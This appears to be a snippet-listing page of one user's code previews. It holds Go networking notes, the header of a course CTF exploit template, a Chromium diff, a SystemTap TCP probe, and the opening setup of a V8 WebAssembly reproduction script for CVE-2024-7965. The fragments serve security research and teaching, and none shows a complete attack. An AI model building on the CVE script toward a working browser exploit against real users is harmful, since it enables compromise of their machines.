buptsb

type Session struct {
    Conns []net.Conn
}

packet
    timeout timer 
    history

    onTimeout
        // ? find another conn(not in history)

buptsb

/*
 * CTF-2 `vcat5' exploit (template)
 *
 * Vasileios P. Kemerlis <[email protected]>
 *  - CSCI 1951H: Software Security and Exploitation
 *  - https://cs.brown.edu/courses/csci1951-h/
 */

#include <stdio.h>
#include <stdlib.h>

buptsb

diff --git a/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc b/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
index d84004cd41..739ba61e9f 100644
--- a/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
+++ b/third_party/blink/renderer/bindings/core/v8/v8_dom_configuration.cc
@@ -520,7 +520,7 @@ void InstallMethodInternal(
   if (!WorldConfigurationApplies(config, world))
     return;
 
-  v8::Local<v8::String> name = config.MethodName(isolate);
+  v8::Local<v8::Name> name = config.MethodName(isolate);

buptsb

sudo stap -v -e 'probe kernel.function("tcp_data_queue") {
    tcphdr = __get_skb_tcphdr($skb);
    sport = __tcp_skb_sport(tcphdr);
    if (sport == 34025) {
      seq = @cast($skb->cb, "tcp_skb_cb")->seq;
      end_seq = @cast($skb->cb, "tcp_skb_cb")->end_seq;
      printf("%d %d %d %d\n", sport, seq, end_seq, end_seq - seq);
      // print_backtrace(); 
      // exit()                                                                                                                                                                                                                               
    }

buptsb

[
  {
    "offset": 0,
    "binary": "0x5f000000",
    "fieldIndex": 1,
    "repr": 4,
    "kind": 1
  },
  {
    "offset": 4,

buptsb

// ./d8 --allow-natives-syntax --trace-turbo --trace_turbo_graph --trace_deopt --trace_compilation_dependencies --trace_wasm_compiler --code-comments --compile_hints_magic --trace-wasm-decoder --soft-abort --expose-gc  ~/cves/CVE-2024-7965/1.js

const prefix = "...";
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
const builder = new WasmModuleBuilder();

const $g0 = builder.addGlobal(kWasmI32, true, false);
const $g1 = builder.addGlobal(kWasmI32, true, false);
const $g2 = builder.addGlobal(kWasmI64, true, false);
const $g3 = builder.addGlobal(kWasmI64, true, false);